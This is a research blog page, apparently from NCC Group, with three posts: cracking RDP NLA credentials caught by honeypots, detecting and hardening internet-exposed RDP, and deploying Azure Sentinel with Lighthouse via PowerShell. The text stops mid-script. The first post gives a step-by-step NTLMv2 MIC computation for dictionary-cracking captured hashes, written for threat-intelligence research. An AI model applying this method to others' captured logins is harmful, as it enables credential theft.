🔒
There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

Cracking RDP NLA Supplied Credentials for Threat Intelligence

21 October 2021 at 19:40
By: Ray Lai

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may be attempting to connect with NLA enabled, which is a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords being sent over NLA connections to ascertain those supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which includes the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

  1. Capture a legitimate NLA connection.
  2. Parse and extract the key fields from the packets.
  3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server software that supported NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we determined six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

  1. Negotiate In
  2. Negotiate Out
  3. Challenge In
  4. Challenge Out
  5. Authenticate In
  6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.

Parsing the packets

With the messages stored in files, we began work to parse these messages. For a proof of concept, we wrote a parser for these six messages in Python in order to have a high-level understanding of what was needed in order to crack the hashes contained within the messages. We parsed out each field into its own object, taking hints from FreeRDP code.

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of the function), we also added code to individual functions to dump raw bytes that were given as inputs and outputs in order to ensure that the calculations were correctly done in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authentication In” message from the client. At that point, it takes all the previous messages, performs some calculation on it, and compares it with the “MIC” stored in the “Authentication In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian
NtHash = MD4(Password)
NtlmV2Hash = HMAC_MD5(NtHash, User + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
                  + "\x01\x01\x00\x00\x00\x00\x00\x00"
                  + ChallengeIn->Timestamp
                  + AuthenticateIn->ClientChallenge
                  + "\x00\x00\x00\x00"
                  + ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
    ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
    ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project we have open sourced here – https://github.com/nccgroup/nlahoney this includes:

Along with all our supporting research notes and code.

Future

The next logical step would be to rewrite the Python password cracker into a hashcat module, left as an exercise to the reader.

Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet

21 October 2021 at 16:48

Category:  Detection/Reduction/Prevention

Overview

Remote Desktop Protocol (RDP) is how users of Microsoft Windows systems can get a remote desktop on systems remotely to manage one or more workstations and/or servers.  With the increase of organizations opting for remote work, so to has RDP usage over the internet increased. However, RDP was not initially designed with the security and privacy features needed to use it securely over the internet. RDP communicates over the widely known port 3389 making it very easy to discover by criminal threat actors.  Furthermore, the default authentication method is limited to only a username and password.

The dangers of RDP exposure, and similar solutions such as TeamViewer (port 5958) and VNC (port 5900) are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP Compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.” 

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE- 2019-0708) first reported in May 2019 was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7.  Subsequently, September 2019 saw the release of a public wormable exploit for the RDP vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of authentication mechanisms for RDP significantly increases the risk to organizations with instances of exposed RDP to the internet. By default, RDP does not have a built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations will have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further highlighted through user propensity for password reuse. Employees using the same password for RDP as they do for other websites means if a website gets breached, threat actors will likely add that password to a list for use with brute force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP.  Shorter and easily remembered passwords give threat actors an increased chance of success in the brute force of exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

Detecting the use of RDP is something that is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, furthering the challenge to organizations to secure RDP. 

RDP Access in the logs

RDP logons or attacks will generate several log events in several event logs.  These events will be found on the target systems that had RDP sessions attempted or completed, or Active directory that handled the authentication.  These events would need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior.  There are also events on the source system that can be collected, but we will save that for another blog.

Being that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activities. For investigations, the more logs, the better if malicious behavior is suspected.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are likely not to impact a log management volume or license. This is especially true because RDP logs are only found on the target system, and typically RDP is seldom used for workstations.

Generally, if you can collect a low noise/volume high validity event from all endpoints into a log management solution, the better your malicious detection can be. An organization will need to test and decide which events to ingest based collectively on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Audit Logon = Success and Failed

The following query logic can be used and contain a lot of details about all authentication to a system, so a high volume event:

  • Event Log = Security
  • Event ID = 4624 (success)
  • Event ID = 4625 (failed)
  • Logon Type = 10 (RDP)
  • Account Name = The user name logging off
  • Workstation Name = This will be from the log of system being logged off from

Optionally, another logon can be enabled to collect RDP events, but this will also generate a lot of other logon noise.  The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Other Logon/Logoff Events = Success and Failed

The following query logic can be used and contain a few details about session authentication to a system, so a low volume event:

  • Event Log = Security
  • Event ID = 4778 (connect)
  • Event ID = 4779 (disconnect)
  • Account Name = The user name logging off
  • Session Name = RDP-Tcp#3
  • Client Name = This will be the system name of the source system making the RDP connection
  • Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP logs that will record valuable events that can be investigated during an incident to determine the source of the RDP login.  Fortunately, the Windows Advanced Audit Policy will not need to be updated to collect these events and are on by default:

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

  • Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager
  • Event ID = 21 (RDP connect)
  • Event ID = 24 (RDP disconnect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated
  • Message = The connection type

The nice thing about having these logs is that even if a threat actor clears the log before disconnecting, the Event ID 24 (disconnect) will be created after the logs have been cleared and then the user disconnects.  This allows tracing of the path of the user and/or treat actor took from system to system.

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager

  • Event ID = 1149 (RDP connect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient

  • Event ID = 1024 (RDP connection attempt)
  • Event ID = 1102 (RDP connect)
  • Message = The system where the RDP connection originated

Threat Hunting

The event IDs previously mentioned would be a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need to have a solution or way to check each workstation and server for these events in the appropriate log or use a log management SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately, the disconnect event will be in the logs allowing the investigator to see the source of the RDP disconnect. This disconnect (event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet.  NCC Group has investigated many incidents where our customers have had RDP open to the internet only to find that it was actively under attack without the client knowing it or the source of the compromise.  Knowing that RDP is highly vulnerable, as the Coveware report states, removing RDP from the internet, securing it, or finding another alternative is the highest recommendation NCC Group can make for organizations that need RDP for remote desktop functions.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role that is added to a Windows Server that you publish to the internet that provides SSL (encrypted RDP over ports TCP 443 and UDP 3391) access instead of the RDP protocol over port 3389.  The RD Gateway option is more secure than just RDP alone, but still should be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to use RDP behind a VPN.  If VPN infrastructure is already in place, organizations have, or can easily adjust their firewalls to meet this.  Organizations should also monitor VPN logins for access attempts, and the source IP resolved to the country of origin.  Known good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before to internal systems via RDP.  However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as fast as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended to simply prevent RDP attacks, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture port 3389 attempts. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on a given port in which an attacker can then change their port target.

IP Address restrictions

Lastly, organizations can use a dedicated firewall appliance or Windows Firewall on the host machines managed by Group Policy to restrict RDP connections to known good IP addresses. However, this option comes with a high administrative burden as more users are provisioned or travel for work. Nevertheless, this option is often the best short-term solution to secure RDP until one of the more robust solutions can be engineered and put in place.

Conclusion

Organizations should take careful consideration when utilizing RDP over the internet. We hope this blog entry helps provide options to reduce the risk of infection and compromise from ever-increasing attacks on RDP, as well as some things to consider when implementing and using RDP. 

References and Additional Reading

Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments

19 October 2021 at 17:27

NCC Group is offering a new fully Managed Detection and Response (MDR) service for our customers in Azure. This blog post gives a behind the scenes view of some of the automated processes involved in setting up new environments and managing custom analytics for each customer, including details about our scripting and automated build and release pipelines, which are deployed as infrastructure-as-code.

If you are:

  • a current or potential customer interested in how we manage our releases
  • just starting your journey into onboarding Sentinel for large multi-Tenant environments
  • are looking to enhance existing deployment mechanisms
  • are interested in a way to manage multi-Tenant deployments with varying set-up

…you have come to the right place!

Background

Sentinel is Microsoft’s new Security Information and Event Management solution hosted entirely on Azure.

NCC Group has been providing MDR services for a number of years using Splunk and we are now adding Sentinel to the list.

The benefit of Sentinel over the Splunk offering is that you will be able to leverage existing Azure licenses and all data will be collected and visibile in your own Azure tenants.

The only bits we keep on our side are the custom analytics and data enrichment functions we write for analysing the data.

What you might learn

The solution covered in this article provides a possible way to create an enterprise scale solution that, once implemented, gives the following benefits:

  • Management of a large numbers of tenants with differing configurations and analytics
  • Minimal manual steps for onboarding new tenants
  • Development and source control of new custom analytics
  • Management of multiple tenants within one Sentinel instance
  • Zero downtime / parallel deployments of new analytics
  • Custom web portal to manage onboarding, analytics creation, baselining, and configuration of each individual tenants’ connectors and enabled analytics

The main components

Azure Sentinel

Sentinel is Microsoft’s cloud native SIEM (Security Incident and Event Management) solution. It allows for gathering of a large number of log and event sources to be interrogated in real time, using in-built and custom KQL to automatically identify and respond to threats.

Lighthouse

Azure Lighthouse enables multi-tenant management with scalability, higher automation, and enhanced governance across resources.”

In essence, it allows a master tenant direct access to one or many sub or customer tenants without the need to switch directory or create custom solutions.

Lighthouse is used in this solution to connect to log analytics workspaces in additional tenants and view them within the same instance of Sentinel in our “master tenant”.

Log Analytics Workspaces

Analytics workspaces are where the data sources connected to Sentinel go into in this scenario. We will connect workspaces from multiple tenants via Lighthouse to allow for cross tenant analysis.

Azure DevOps (ADO)

Azure DevOps provides the core functionality for this solution used for both its CI/CD pipelines (Using YAML, not Classic for this) and inbuilt Git repos. The solutions provided will of course work if you decide to go for a different system.

App Service

To allow for easy management of configurations, onboarding and analytics development / baselining we hosted a small Web application written in Blazor, to avoid having to manually change JSON config files. The app also draws in MITRE and other additional data to enrich analytics.

Technologies breakdown:

In order for us to create and manage the required services we need to make use Infrastructure as Code (IaC), scripting, automated build and release pipelines as well as have a way to develop a management portal.

The technologies we ended up using for this were:

  • ARM Templates for general resource deployments and some of the connectors
  • PowerShell using Microsoft AZ / Sentinel and Roberto Rodriquez’s Azure-Sentinel2Go   
  • API calls for baselining and connectors not available through PowerShell modules
  • Blazor for configuration portal development
  • C# for API backend Azure function development
  • YAML Azure DevOps Pipelines

Phase 1: Tenant Onboarding

Let’s step through this diagram.

We are going to have a portal that allows us to configure a new client, go through an approval step to ensure configs are peer reviewed before going into production, by pushing the configuration into a new branch in source control, then trigger a Deployment pipeline.

The pipeline triggers 2 Tenant deployments.

Tenant A is our “Master tenant” that will hold the main Sentinel, all custom analytics, alerts, and playbooks and connect, using lighthouse, to all “Sub tenants” (Tenant B).

In the large organisations we would create a 1:1 mapping for each sub tenant by deploying additional workspaces that then point to the individual tenants. This has the benefit of keeping the analytics centralised, protecting intellectual property. You could, however, deploy them directly into the actual workspaces once Lighthouse is set up or have one workspace that queries all the others.

Tenant B and all other additional Tenants have their own instance of Sentinel with all required connectors enabled and need to have the lighthouse connection initiated from that side.

Pre-requisites:

To be able to deploy to either of the tenants we need Service connections for Azure DevOps to be in place.

“Sub tenant” deployment:

Some of the Sentinel Connectors need pretty extreme permissions to be enabled, for example to configure the Active Directory connector properly we need Global Administrator, Security Administrator roles as well as root scope Owner permissions on the tenant.  

In most cases, once the initial set up of the “sub tenant” is done there will rarely be a need to add additional connectors or deploy to that tenant, as all analytics are created on the “Master tenant”. I would strongly suggest either to disable or completely remove the Tenant B service connection after setup. If you are planning to regularly change connectors and are happy with the risk of leaving this service principal in place, then the steps will allow you to do this.

A sample script for setting this up the “Sub tenant” service Principal

$rgName = 'resourceGroupName' ## set the value of this to the resource group name containing the sentinel log analytics workspace
Connect-AzAccount
$cont = Get-AzContext
Connect-AzureAD -TenantId $cont.Tenant
 
$sp = New-AzADServicePrincipal -DisplayName ADOServicePrincipalName

Sleep 20
$assignment =  New-AzRoleAssignment -RoleDefinitionName Owner -Scope '/' -ServicePrincipalName $sp.ApplicationId -ErrorAction SilentlyContinue
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)/resourceGroups/$($rgName)" -ServicePrincipalName $sp.ApplicationId
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)" -ServicePrincipalName $sp.ApplicationId

$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sp.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$roles = Get-AzureADDirectoryRole | Where-Object {$_.displayName -in ("Global Administrator","Security Administrator")}
foreach($role in $roles)
{
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.Id
}
$activeDirectorySettingsPermissions = (-not $assignment -eq $null)
$sp | select @{Name = 'Secret'; Expression = {$UnsecureSecret}},@{Name = 'tenant'; Expression = {$cont.Tenant}},@{Name = 'Active Directory Settings Permissions'; Expression = {$activeDirectorySettingsPermissions}},@{Name = 'sub'; Expression = {$cont.Subscription}}, applicationId, Id, DisplayName

This script will:

  1. create a new Service Principal,
  2. set the Global Administrator and Security Administrator roles for the principal,
  3. attempt to give root scope Owner permissions as well as subscription scope owner as a backup as this is the minimum required to connect Lighthouse if the root scope permissions are not set.

The end of the script prints out the details required to set this up as a Service connection in Azure DevOps . You could of course continue on to add the Service connection directly to Azure DevOps if the person running the script has access to both, but it was not feasible for my requirements.

For Tenant A we have 2 options.

Option 1: One Active Directory group to rule them all

This is something you might do if you are setting things up for your own multi-tenant environments. If you are have multiple environments to manage and different analysts’ access for each, I would strongly suggest using option 2.

Create an empty Azure Active Directory group either manually or using

(New-AzADGroup -DisplayName 'GroupName' -MailNickname 'none').Id
(Get-AzTenant).Id

You will need the ID of both the Group and the tenant in a second so don’t lose it just yet.

Once the group is created, set up a Service Connection to your Master tenant from Azure DevOps (just use the normal connection Wizard), then add the Service Principal to the newly created group as well as users you want to have access to the Sentinel (log analytics) workspaces.

To match the additional steps in Option 2, create a Variable group (either directly but masked or connected to a KeyVault depending on your preference) in Azure DevOps (Pipelines->Library->+Variable Group)

Make sure you restrict both Security and Pipeline permissions for the variable group to only be usable for the appropriate pipelines and users whenever creating variable groups.

Then Add:

AAdGroupID with your new Group ID

And

TenantID with the Tenant ID of the master tenant.

Then reference the Group at the top of your YAML pipeline within the Job section with

variables:
      - group: YourGroupName

Option 2: One group per “Sub tenant”

If you are managing customers, this is a much better way to handle things. You will be able to assign different users, to the groups to ensure only the correct people have access to the environments they are meant to have.

However, to be able to do this you need a Service Connection with some additional rights in your “Master Tenant”, so your pipelines can automatically create customer specific AD groups and add the Service principal to them.

Set up a Service Connection from Azure DevOps to your Master Tenant, then find the Service Principal and give it the following permissions

  • Azure Active Directory Graph
    • Directory.ReadWrite.All
  • Microsoft Graph
    • Directory.ReadWrite.All
    • PrivilegedAccess.ReadWrite.AzureADGroup

Then include the following script in your Pipeline to Create the group to be used for each customer and adding the service principal name to it.

param(
    [string]$AADgroupName,
    [string]$ADOServicePrincipalName
)
$group1 = Get-AzADGroup -DisplayName $AADgroupName -ErrorAction SilentlyContinue
if(-not $group1)
{
$guid1 = New-Guid
$group1 = New-AzADGroup -DisplayName $AADgroupName  -MailNickname $guid1 -Description $AADgroupName
$spID = (Get-AzADServicePrincipal -DisplayName $ADOServicePrincipalName).Id
Add-AzADGroupMember -MemberObjectId $spID -TargetGroupObjectId $group1.Id
}
$id = $group1.id
$tenant = (Get-AzTenant).Id
Write-Host "##vso[task.setvariable variable=AAdGroupId;isOutput=true]$($id)"
Write-Host "##vso[task.setvariable variable=TenantId;isOutput=true]$($tenant)" 

The Write-Hosts at the end of the script outputs the group and Tenant ID back to the pipeline to be used in setting up Lighthouse later.

With the boring bits out of the way, let’s get into the core of things.

Client configurations

First, we need to create configuration files to be able to manage the connectors and analytics that get deployed for each “Sub tenant”.

You can of course do this manually, but I opted to go for a slightly more user-friendly approach with the Blazor App.

The main bits we need, highlighted in yellow above are:

  • A name for the config
  • The Azure DevOps Service Connection name for the target Sub tenant,
  • Azure Region (if you are planning to deploy to multiple regions),
  • Target Resource Group and Target Workspace, this is either where the current Log Analytics of your target environment already exist or should be created.

Client config Schema:

    public class ClientConfig
    {
        public string ClientName { set; get; } = "";
        public string ServiceConnection { set; get; } = "";
        public List<Alert> SentinelAlerts { set; get; } = new List<Alert>();
        public List<Search> SavedSearches { set; get; } = new List<Search>();
        public string TargetWorkspaceName { set; get; } = "";
        public string TargetResourceGroup { set; get; } = "";
        public string Location { get; set; } = "UK South";
        public string connectors { get; set; } = "";
    }

Sample Config output:

{
    "ClientName": "TenantB",
    "ServiceConnection": "ServiceConnectionName",
    "SentinelAlerts": [
        {
            "Name": "ncc_t1558.003_kerberoasting"
        },
        {
            "Name": "ncc_t1558.003_kerberoasting_downgrade_v1a"
        }
    ],
    "SavedSearches": [],
    "TargetWorkspaceName": "targetworkspace",
    "TargetResourceGroup": "targetresourcegroup",
    "Location": "UK South",
    "connectors": "Office365,ThreatIntelligence,OfficeATP,AzureAdvancedThreatProtection,AzureActiveDirectory,MicrosoftDefenderAdvancedThreatProtection,AzureSecurityCenter,MicrosoftCloudAppSecurity,AzureActivity,SecurityEvents,WindowsFirewall,DNS,Syslog"
}

This data can then be pushed onto a storage account and imported into Git from a pipeline triggered through the app.

pool:
vmImage: 'windows-latest'

steps:
-checkout: self
 persistCredentials: true
  clean: true
- task: [email protected]
  displayName: 'Export Configs'
  inputs:
azureSubscription: 'Tenant A Service Connection name'
    ScriptType: 'FilePath'
    ScriptPath: '$(Build.SourcesDirectory)/Scripts/Exports/ConfigExport.ps1'
    ScriptArguments: '-resourceGroupName "StorageAccountResourceGroupName" -storageName "storageaccountname" -outPath "Sentinel\ClientConfigs\" -container "configs"'
    azurePowerShellVersion: 'LatestVersion'

- task: [email protected]
  displayName: 'Commit Changes to new Git Branch'
  inputs:
filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/PushToGit.ps1'
    arguments: '-branchName conf$(Build.BuildNumber)'

Where ConfigExports.ps1 is

param(
    [string]$ResourceGroupName ,
    [string]$storageName ,
    [string]$outPath =,
    [string]$container
)

$ctx = (Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -Name $storageName).Context
$blobs  = Get-AzStorageBlob -Container $container -Context $ctx

if(-not (Test-Path -Path $outPath))
{
New-Item -ItemType directory $outPath -Force
}
Get-ChildItem -Path $outPath -Recurse | Remove-Item -force -recurse
foreach($file in $blobs)
{
Get-AzStorageBlobContent -Context $ctx -Container $container -Blob $file.Name  -Destination ("$($outPath)/$($file.Name)") -Force
}

And PushToGit.ps1

param(
[string] $branchName
)
git --version
git switch -c $branchName
git add -A
git config user.email [email protected]
git config user.name "Automated Build"
git commit -a -m "Commiting rules to git"
git push --set-upstream -f origin $branchName

This will download the config files, create a new Branch in the Azure DevOps Git Repo and upload the files.

The branch can then be reviewed and merged. You could bypass this and check directly into the main branch if you want less manual intervention, but the manual review adds an extra layer of security to ensure no configs are accidentally / maliciously changed.

Creating Analytics

For analytics creation we have 2 options.

  1. Create Analytics in a Sentinel Test environment and export them to git. This will allow you to source control analytics as well as review any changes before allowing them into the main branch.
param(
[string]$resourceGroupName,
[string]$workspaceName,
[string]$outPath,
[string]$module='Scripts/Modules/Remove-InvalidFileNameChars.ps1'
)
import-module $module

Install-Module -Name Az.Accounts -AllowClobber -Force

Install-Module -Name Az.SecurityInsights -AllowClobber -Force

$results =Get-AzSentinelAlertRule -WorkspaceName $workspaceName -ResourceGroupName $resourceGroupName
$results
$myExtension = ".json"
$output = @()
foreach($temp in $results){
    
    if($temp.DisplayName)
    {
    $resultName = $temp.DisplayName
    if($temp.query)
    {
    if($temp.query.Contains($workspaceName))
    {
    $temp.query= $temp.query -replace $workspaceName , '{{targetWorkspace}}'
    $myExportPath = "$($outPath)\Alerts\$($temp.productFilter)\"
    if(-not (Test-Path -Path $myExportPath))
    {
    new-item -ItemType Directory -Force -Path $myExportPath
    }
    $rule = $temp | ConvertTo-Json
    $resultName = Remove-InvalidFileNameChars -Name $resultName
    $folder = "$($myExportPath)$($resultName)$($myExtension)"
    $properties= [pscustomobject]@{DisplayName=($temp.DisplayName);RuleName=$resultName;Category=($temp.productFilter);Path=$myExportPath}
    $output += $properties
    $rule | Out-File $folder -Force
    }
    }
    }
} 

Note the -replace $workspaceName , ‘{{targetWorkspace}}’. This replaces the actual workspace used in our test environments via workspace(‘testworkspaceName’)with workspace(‘{{targetWorkspace}}’) to allow us to then replace it with the actual “Sub tenants” workspace name when being deployed.

  1. Create your own analytics in a custom portal, for the Blazor Portal I found Microsoft.Azure.Kusto.Language very useful for validating the KQL queries.

The benefit of creating your own is the ability to enrich what goes into them.

You might, for example, want to add full MITRE details into the analytics to be able to easily generate a MITRE coverage report for the created analytics.

If you are this way inclined, when deploying the analytics, use a generic template from Sentinel and replace the required values before submitting it back to your target Sentinel.

{
    "AlertRuleTemplateName":  null,
    "DisplayName":  "{DisplayPrefix}{DisplayName}",
    "Description":  "{Description}",
    "Enabled":  true,
    "LastModifiedUtc":  "\/Date(1619707105808)\/",
    "Query":  "{query}"
    "QueryFrequency":  {
                           "Ticks":  9000000000,"Days":  0,
                           "Hours":  0, "Milliseconds":  0, Minutes":  15, "Seconds":  0,
                           "TotalDays":  0.010416666666666666, "TotalHours":  0.25,
                           "TotalMilliseconds":  900000,
                           "TotalMinutes":  15, "TotalSeconds":  900
                       },
    "QueryPeriod":  {
                        "Ticks":  9000000000,
                        "Days":  0, "Hours":  0, "Milliseconds":  0, "Minutes":  15,
                        "Seconds":  0,
                        "TotalDays":  0.010416666666666666,
                        "TotalHours":  0.25,
                        "TotalMilliseconds":  900000,
                        "TotalMinutes":  15,
                        "TotalSeconds":  900
                    },
    "Severity":  "{Severity}",
    "SuppressionDuration":  {
"Ticks":  180000000000, "Days":  0, "Hours":  5, "Milliseconds":  0, "Minutes":  0,"Seconds":  0,"TotalDays":  0.20833333333333331, "TotalHours":  5, "TotalMilliseconds":  18000000, "TotalMinutes":  300, "TotalSeconds":  18000
                            },
    "SuppressionEnabled":  false, "TriggerOperator":  0, "TriggerThreshold":  0,
    "Tactics":  [
                    "DefenseEvasion"
                ],
    "Id":  "{alertRuleID}",
    "Name":  "{alertRuleguid}",
    "Type":  "Microsoft.SecurityInsights/alertRules",
    "Kind":  "Scheduled"
}

Let’s Lighthouse this up!

Now we have the service connections and initial client config in place, we can start building the Onboarding pipeline for Tenant B.

As part of this we will cover:

  • Generate consistent naming conventions
  • Creating the Log Analytics workspace specified in config and enabling Sentinel
  • Setting up the Lighthouse connection to Tenant A
  • Enabling the required Connectors in Sentinel

Consistent naming (optional)

There are a lot of different ways for getting naming conventions done.

I quite like to push a few parameters into a PowerShell script, then write the naming conventions back to the pipeline, so the convention script can be used in multiple pipelines to provide consistency and easy maintainability.

The below script generates variables for a select number of resources, then pushes them out to the pipeline.

param(
[string]$location,[string]$environment,[string]$customerIdentifier,[string]$instance)
$location = $location.ToLower()
$environment = $environment.ToLower()
$customerIdentifier = $customerIdentifier.ToLower()
$instance = $instance.ToLower()
$conventions = New-Object -TypeName psobject 
$conventions | Add-Member -MemberType NoteProperty -Name CustomerResourceGroup -Value "rg-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name LogAnalyticsWorkspace -Value "la-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name CustLogicAppPrefix -Value "wf-$($location)-$($environment)-$($customerIdentifier)-"
$conventions | Add-Member -MemberType NoteProperty -Name CustFunctionAppPrefix -Value "fa-$($location)-$($environment)-$($customerIdentifier)-"
foreach($convention in $conventions.psobject.Properties | Select-Object -Property name, value)
{
Write-Host "##vso[task.setvariable variable=$($convention.name);isOutput=true]$($convention.Value)"
}

Sample use would be

  - task: [email protected]
    name: "naming"
    inputs:
      filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/GenerateNamingConvention.ps1'
      arguments: '-location "some Location" -environment "some environment" -customerIdentifier "some identifier" -instance "some instance"'

  - task: [email protected]
    displayName: 'Sample task using variables from naming task'
    inputs:
      azureSubscription: '$(ServiceConnection)'
      ScriptType: 'FilePath'
      ScriptPath: 'some script path'
      ScriptArguments: '-resourceGroup "$(naming.StorageResourceGroup )" -workspaceName "$(naming.LogAnalyticsWorkspace)"'
      azurePowerShellVersion: 'LatestVersion'
      pwsh: true

Configure Log analytics workspace in sub tenant / enable Sentinel

You could do the following using ARM, however, in the actual solution, I am doing a lot of additional taskswith the Workspace that were much easier to achieve in script (hence my choice to script it instead).

Create new workspace if it doesn’t exist:

param(
[string]$resourceGroupName,
[string]$workspaceName,
[string]$Location
[string]$sku
)
$rg = Get-AzResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue
if(-not $rg)
{
New-AzResourceGroup -Name $resourceGroupName -Location $Location
}
$ws = Get-AzOperationalInsightsWorkspace -ResourceGroupName $resourceGroupName -Name $workspaceName -ErrorAction SilentlyContinue
if(-not $ws){
$ws = New-AzOperationalInsightsWorkspace -Location $Location -Name $workspaceName -Sku $sku -ResourceGroupName $resourceGroupName -RetentionInDays 90
}

Check if Sentinel is already enabled for the Workspace and enable it if not:

param(
[string]$resourceGroupName,
[string]$workspaceName
)
Install-Module AzSentinel -Scope CurrentUser -Force -AllowClobber
Import-Module AzSentinel

    $solutions = Get-AzOperationalInsightsIntelligencePack -resourcegroupname $resourceGroupName -WorkspaceName $workspaceName -ErrorAction SilentlyContinue

    if (($solutions | Where-Object Name -eq 'SecurityInsights').Enabled) {
        Write-Host "SecurityInsights solution is already enabled for workspace $($workspaceName)"
    }
    else {
        Set-AzSentinel -WorkspaceName $workspaceName -Confirm:$false
    }

Setting up Lighthouse to the Master tenant

param(
[string]$customerConfig='',
[string]$templateFile = '',
